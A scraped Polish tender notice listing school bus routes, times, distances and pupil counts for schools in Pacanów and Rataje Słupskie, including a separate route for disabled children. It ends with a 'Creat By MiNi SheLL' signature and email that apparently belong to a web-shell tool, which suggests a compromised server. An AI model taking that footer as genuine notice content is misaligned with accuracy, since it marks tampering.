Początek Trasy: SP. i Gim Pacanów - ul. Wójczańska - droga krajowa Kielce-Tarnów - Niegosławice (4) - Słupia (35)- ul. Słupska - Przedszkole Pacanów - koniec trasy SP i Gim Pacanów

Kurs nr II - 12,6 km godz. 07:45 - 08:10 (37 uczniów)
Początek Trasy: SP. i Gim Pacanów - Karsy Małe (22) - Książnice (6) - Karsy Duże (9)- Słupia - SP i Gim Pacanów - koniec trasy Przedszkole Pacanów

DOWÓZ III: 36,7 km, 86 uczniów

Kurs nr I - 20,9 km ok 06:45 - 07:25, (42 uczniów)
Początek trasy SP i Gim. Rataje Słupskie - Rataje Karskie (3) - Grabowica (6) - Komorów (6) - Kółko Żabieckie (12) - Żabiec (15) - koniec trasy SP i Gim. Rataje Słupskie 

Kurs nr II - 15,8 km ok 07:30 - 07:50, (44 uczniów)
Początek trasy SP i Gim. Rataje Słupskie - Żabiec (31) - Kółko Żabieckie (8) - Żabiec - Rataje Karskie (5) - koniec trasy SP i Gim. Rataje Słupskie 

DOWÓZ IV: 20 km, 43 uczniów

Dowóz - 20 km godz. 07:30 - 08:00 (43 uczniów)
Początek trasy SP i Gim. Rataje Słupskie - Komorów (16) - Grabowica (22) - Żabiec  (5) - koniec trasy SP i Gim. Rataje Słupskie 
ODWÓZ I: 79,2 km, 132 uczniów

Kurs nr I - 37,2 km godz. 12:45 - 13:55, 
Początek trasy: Przedszkole Pacanów - SP i Gim. Pacanów - droga krajowa Sandomierz - Kraków - Wola Biechowska - Biechów - Wójcza  Przedszkole - Wójcza szkoła - Wójeczka - Wójcza szkoła - Wójcza Plebanka - Chrzanów remiza - Wójcza szkoła - Wójcza Przedszkole - Biechów - Zołcza Ugory - Piestrzec - Wola Biechowska - Słupia - droga krajowa Kielce-Tarnów - Rynek - koniec trasy SP i Gim. Pacanów

Kurs nr II - 14,8 km godz. 14:00 -  14:40,
Początek trasy: SP i Gim. Pacanów - droga krajowa Kraków-Sandomierz - Wola Biechowska - Biechów - Wójcza - Wójcza Plebanka - Chrzanów - Niegosławice - Rynek ul. Słupska - koniec trasy SP i Gim. Pacanów

Kurs nr III - 27,2 km godz. 14:45 - 15:25, 
Początek trasy: SP i Gim. Pacanów - droga krajowa Kraków-Sandomierz - Wola Biechowska - Zołcza Ugory - Piestrzec - Biechów - Wójcza - Wójeczka - Wójcza Plebanka - Chrzanów - Niegosławice - Rynek - koniec trasy SP i Gim. Pacanów
ODWÓZ II: 39,6 km, 76 uczniów

Kurs nr I - 15,2 km godz. 13:00 - 13:40, 
Początek trasy: SP i Gim Pacanów - Przedszkole Pacanów - ul. Wójczańska - droga krajowa Kielce-Tarnów - Niegosławice - Słupia - Karsy Duże - Karsy Dolne - Karsy Małe - Książnice - koniec trasy SP i Gim Pacanów

Kurs nr II - 12,6 km godz. 13:50 - 14:30, 
Początek trasy: SP i Gim Pacanów - Przedszkole Pacanów - ul. Słupska - Słupia Mleczarnia - Karsy Duże - Karsy Dolne - Karsy Małe - Książnice - koniec trasy SP i Gim Pacanów

Kurs nr III - 11,8 km godz. 14:40 - 15:05 
Początek trasy: SP i Gim Pacanów - Przedszkole Pacanów - ul. Słupska - Słupia - Karsy Duże - Karsy Dolne - Karsy Małe - Książnice - koniec trasy SP i Gim Pacanów

ODWÓZ III: 56,3 km, 86 uczniów

Kurs nr I - 19,6 km ok 12:45 - 13:20, 
Początek trasy SP i Gim. Rataje Słupskie - Żabiec - Grabowica - Komorów - Kółko Żabieckie - Żabiec -  Rataje Karskie - koniec trasy SP i Gim. Rataje Słupskie 

Kurs nr II - 15,8 km ok 13:45 - 14:10, 
Początek trasy SP i Gim. Rataje Słupskie - Żabiec - Kółko Żabieckie - Żabiec - Rataje Karskie - koniec trasy SP i Gim. Rataje Słupskie 

Kurs  nr III - 20,9 km ok 14:40 - 15:15, 
Początek trasy SP i Gim. Rataje Słupskie - Żabiec - Kółko Żabieckie - Grabowica - Komorów -  Rataje Karskie - koniec trasy SP i Gim. Rataje Słupskie 

ODWÓZ IV: 20 km, 43 uczniów

Odwóz - 20 km, godz. 13:45 - 15:15 (43 uczniów) - dokładne godziny odwozu dostosowane będą do aktualnych potrzeb szkoły
Początek trasy SP i Gim. Rataje Słupskie - Rataje Karskie - Żabiec - Kółko Żabieckie - Komorów - Grabowica - Żabiec - Rataje Karskie - Rataje Słupskie - koniec trasy SP i Gim. Rataje Słupskie 

Razem: 317,8 km
Dowóz: 337 uczniów,
Odwóz: 337 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 60.10.11.11-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. 2)	czas podstawienia autobusu w przypadku awarii - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Trasa dowozu dzieci niepełnosprawnych do Gimnazjum Nr 2 w Ratajach Słupskich
i Niepublicznego Ośrodka Rewalidacyjno-Wychowawczego w Kupieninie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> DOWÓZ: 35 km, 8 uczniów

Dowóz - 35 km godz. 07:30 - 08:00 
Początek trasy Pacanów, ul. Beszowska (1) - Grabowica (2) - Komorów (4) - Gimnazjum Nr 2 w Ratajach Słupskich (2 dzieci wysiada) - Rataje Słupskie (1) - koniec trasy Ośrodek Rewalidacyjno-Wychowawczy
w Kupieninie

ODWÓZ: 35 km, 8 uczniów

Odwóz - 35 km po zajęciach w Ośrodku Rewalidacyjno-Wychowawczym w Kupieninie  
Początek trasy Ośrodek Rewalidacyjno-Wychowawczy w Kupieninie - Rataje Słupskie - Gimnazjum Nr 2
w Ratajach Słupskich -- Grabowica - Komorów - koniec trasy Pacanów, ul. Beszowska 





Razem: 70 km
Dowóz: 7 uczniów,
Odwóz: 7 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 60.10.11.11-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. 2)	czas podstawienia autobusu w przypadku awarii - 2</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com